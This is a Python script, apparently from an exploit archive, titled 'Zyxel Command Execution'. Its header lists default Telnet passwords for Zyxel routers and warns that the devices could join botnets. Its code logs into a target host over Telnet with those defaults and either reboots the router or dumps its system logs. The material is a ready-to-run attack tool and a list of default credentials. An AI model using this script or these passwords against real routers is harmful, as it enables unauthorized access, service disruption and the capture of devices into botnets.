Zyxel Command Execution

1. #!/usr/bin/python
2. # coding=utf-8
3.  
4. # - - - - - - - - - - - - - - - - - - - - - - - - #
5. # #
6. # Zyxel is a multi-OS supported #
7. # router that runs the services #
8. # Telnet, SSH, & FTP. #
9. # #
10. # - - - - - - - - - - - - - - - - - - - - - - - - #
11. # #
12. # You can execute binaries also #
13. # Witch that means, binaries like; #
14. # MIPS, MIPSEL, SH4, ARMV61, & PowerPC #
15. # #
16. # - - - - - - - - #
17. # #
18. # This would mean these devices #
19. # are potentially endangered of #
20. # becoming part of a 'botnet' #
21. # As i just mentioned with the #
22. # binaries, you can use the binaries #
23. # to allow the device to be a active #
24. # connection with-in your client-side. #
25. # This is very dangerous for users of #
26. # Zyxel. I've ran it upon myself to #
27. # contact Zyxel Communications. #
28. # Even though there is slightly anything #
29. # you can do to fix this problem because #
30. # Its preset-default passwords for Telnet #
31. # Zyxel sent emails to all customers about #
32. # the issues also they left a friendly #
33. # banner on the home-page of their website. #
34. # #
35. # - - - - - - - - - - - - - - - - - - - - - - - - #
36. # #
37. # Discovered by Chris Poole #
38. # #
39. # - - - - - - - - - - - - - - - - - - - - - - - - #
40. # #
41. # http://twitter.com/codingplanets #
42. # #
43. # - - - - - - - - - - - - - - - - - - - - - - - - #
44. # #
45. # Zyxel default telnet password(s) #
46. # #
47. # - - - - - - - - - - - - - - - - - - - - - - - - #
48. # 1234 #
49. # password #
50. # zyxel #
51. # telnet #
52. # admin #
53. # - - - - - - - - - - - - - - - - - - - - - - - - #
54.  
55.  
56. import telnetlib
57. import argparse
58. import sys
59.  
60.  
61. class Zyxel:
62. def __init__(self, host, pw):
63. self.connection = telnetlib.Telnet(host)
64.  
65.  
66. self.password(pw)
67.  
68. self.select("24")
69.  
70.  
71. self.select("8")
72.  
73. self.connection.read_until("> ")
74.  
75. def password(self, password):
76. self.connection.read_until("Password:")
77. self.connection.write(password + "\n")
78.  
79. def select(self, s):
80. self.connection.read_until("Number:")
81. self.connection.write(s + "\n")
82.  
83. def reboot(self):
84. self.connection.write("sys reboot\n") # executes 'reboot'
85. self.disconnect()
86.  
87. def disconnect(self): # disconnects from device
88. self.connection.close()
89.  
90. def logs(self):
91. self.connection.write("sys logs display\n")
92. return self.connection.read_until("> ")
93.  
94.  
95. parser = argparse.ArgumentParser(description='Manage a Zyxel router')
96. parser.add_argument("-p", "--password", type=str, help="password", default="1234", dest="password")
97. parser.add_argument("host", type=str, help="host")
98. parser.add_argument("command", type=str, help="reboot")
99.  
100. args = parser.parse_args()
101.  
102. if args.command == "reboot":
103. zyxel = Zyxel(args.host, args.password)
104. zyxel.reboot()
105. elif args.command == "logs":
106. zyxel = Zyxel(args.host, args.password)
107. print zyxel.logs()
108. zyxel.disconnect()
109. else:
110. print "unknown command: %s" % args.command